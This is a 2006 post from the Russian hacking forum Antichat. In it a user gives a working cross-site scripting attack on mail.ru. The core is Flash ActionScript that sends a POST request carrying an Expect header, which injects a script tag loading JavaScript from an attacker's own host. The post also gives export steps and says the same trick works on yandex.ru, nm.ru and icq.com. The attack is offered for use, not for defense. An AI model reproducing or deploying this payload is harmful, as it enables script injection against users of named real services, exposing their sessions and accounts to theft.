16.10.2006, 19:56
|
|
Members of Antichat - Level 5
Регистрация: 27.01.2006
Сообщений: 258
С нами:
10676486
Репутация:
774
|
|
Xss на mail.ru через expect заголовок.
Для проведения атаки я буду использовать Flash (ActionScript). Ну и естественно нам понадобится программа для создания Flash и у меня это будет Macromedia Flash MX.
Создание Flash:
PHP код:
var req:LoadVars=new LoadVars();
req.addRequestHeader("Expect","<script src=http://yourhost/xss.js></script>");
req.decode("XSS");
req.send("http://www.mail.ru","POST");
Этот ActionScript работает на IE и Firefox, в Opera просто открывается mail.ru.
Уменьшаем размер и экспортируем Flash: File->Export->Export Image.
Вот в принципе и все. Думаю вы знаете что дальше делать.
P.S. Еще работает на yandex.ru, nm.ru и icq.com.
__________________
Завтра будет.Лучше.
Последний раз редактировалось Go0o$E; 16.10.2006 в 20:38..
|
|
|